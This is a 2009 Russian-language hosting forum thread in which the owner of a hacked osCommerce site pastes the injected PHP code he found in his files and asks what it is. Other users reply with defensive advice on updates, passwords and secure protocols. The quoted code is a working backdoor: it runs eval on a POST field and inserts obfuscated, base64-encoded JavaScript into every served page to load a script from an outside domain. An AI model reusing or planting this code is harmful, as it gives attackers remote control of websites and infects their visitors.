Перейти из форума на сайт.

НовостиФайловые архивы
ПоискАктивные темыТоп лист
ПравилаКто в on-line?
Вход Забыли пароль? Первый раз на этом сайте? Регистрация
Компьютерный форум Ru.Board » Интернет » Хостинг » "Взломан" сайт

Модерирует : 3xp0, PEDKA

 Версия для печати • ПодписатьсяДобавить в закладки

Открыть новую тему     Написать ответ в эту тему

Holder 2002



Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Ситуация такая - придя на работу обнаружил проблемы с работой сайта, начал копаться нашел несколько измененных файлов на сайте типа index.php. password.php, configure.php и т.п.
в теле каждого файла нашел вот такой код

Код:
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBUdEM9JyUnO2V2YWwodW5lc2NhcGUoKCd2YXI8MjBhPDNkPDIyU2M8NzJpcHRFPDZlZ2k8NmVlPDIyPDJjYjwzZDwyMlY8NjVyc2lvPDZlKCkrPDIyPDJjajwzZDwyMjwyMjwyY3U8M2RuYXZpPDY3YTw3NG88NzI8MmV1c2VyQWdlbnQ8M2JpZigodTwyZWluZDw2NXhPZig8MjJXaW48MjIpPDNlMDwyOTwyNjwyNjwyOHU8MmU8Njk8NmVkPDY1PDc4PDRmZig8MjJOPDU0PDIwNjwyMik8M2M8MzA8Mjk8MjY8MjY8Mjg8NjQ8NmZjPDc1bWVudDwyZTw2M29va2llPDJlPDY5bmRleE9mKDwyMm08NjllPDZiPDNkMTwyMik8M2MwKTwyNjwyNih0eXBlPDZmZig8N2FyPDc2enRzKTwyMTwzZHQ8NzlwZW88NjYoPDIyQTwyMjwyOSkpPDdienJ2enRzPDNkPDIyPDQxPDIyPDNiPDY1PDc2YTw2Yyg8MjJpZih3aW5kb3c8MmU8MjI8MmJhKzwyMilqPDNkajwyYjwyMithKzwyMk1ham9yPDIyK2IrPDYxKzwyMk1pbm88NzI8MjI8MmI8NjIrPDYxKzwyMkI8NzU8NjlsZDwyMitiPDJiPDIyPDZhPDNiPDIyPDI5PDNiPDY0b2N1bTw2NW50PDJld3I8Njl0PDY1KDwyMjwzY3M8NjNyaTw3MDw3NDwyMHNyPDYzPDNkPDJmPDJmZ3U8NmRiPDZjPDYxcjwyZWNuPDJmcnNzPDJmPDNmaTw2NDwzZDwyMitqKzwyMjwzZTwzYzw1YzwyZnNjcmlwPDc0PDNlPDIyPDI5PDNiPDdkJykucmVwbGFjZSgvPC9nLFR0QykpKX0pKCk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

Все поудалял быстренько...
Комп проверил на вирусы, все чисто, поменял все пароли (все пароли не меньше 8 символов и до этого случая минимум 8 символов)
Что это за хрень?
Как защитится от такой фигни
Хостинг агава!

Всего записей: 158 | Зарегистр. 27-02-2002 | Отправлено: 13:21 05-05-2009
avirarus



Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
А движок какой?

Всего записей: 54 | Зарегистр. 08-02-2008 | Отправлено: 13:42 05-05-2009
Holder 2002



Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Oscommerce

Всего записей: 158 | Зарегистр. 27-02-2002 | Отправлено: 13:47 05-05-2009
avirarus



Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
1 уязвимости в самом php
2 уязвимости в самом  mysql
3 в самом cms (apache)
Советую все обновить......
вход в админку лучше с 1 ip разрешить!
Пройдись MaxPatrol быший xspider!

Всего записей: 54 | Зарегистр. 08-02-2008 | Отправлено: 13:50 05-05-2009
Holder 2002



Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
"наезд" был совершен с 69.16.248.4

Всего записей: 158 | Зарегистр. 27-02-2002 | Отправлено: 14:48 05-05-2009
avirarus



Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
"наезд" был совершен с 69.16.248.4

По любому прокси!

Всего записей: 54 | Зарегистр. 08-02-2008 | Отправлено: 16:09 05-05-2009
worldhosting



Silver Member
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
"Комп проверил на вирусы, все чисто" - если это винды то это еще ни о чем не говорит. Поменять пароль еще раз и НЕ СОХРАНЯТЬ его ни в одном из клиентов, браузеров и т.п  Записать на бумажке и прилепить к монитору. Если после этого проблема повторяться не будет значит переставлять винды или переходить на никсы.

----------
виртуальные и физические серверы от 249 ₽ в Германии или России. SSD хостинг от 179 ₽ в Германии и России

Всего записей: 2569 | Зарегистр. 11-09-2002 | Отправлено: 23:32 05-05-2009
Cheery



.:МордератоР:.
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Holder 2002
1) исправить файлы
2) сменить пароль на ftp
3) проверить комп..  
4) для подключений использовать только защищенные протоколы.

----------
Away/DND

Всего записей: 52737 | Зарегистр. 04-04-2002 | Отправлено: 00:17 06-05-2009
Открыть новую тему     Написать ответ в эту тему

Компьютерный форум Ru.Board » Интернет » Хостинг » "Взломан" сайт


Реклама на форуме Ru.Board.

Powered by Ikonboard "v2.1.7b" © 2000 Ikonboard.com
Modified by Ru.B0ard
© Ru.B0ard 2000-2024

BitCoin: 1NGG1chHtUvrtEqjeerQCKDMUi6S6CG4iC

Рейтинг.ru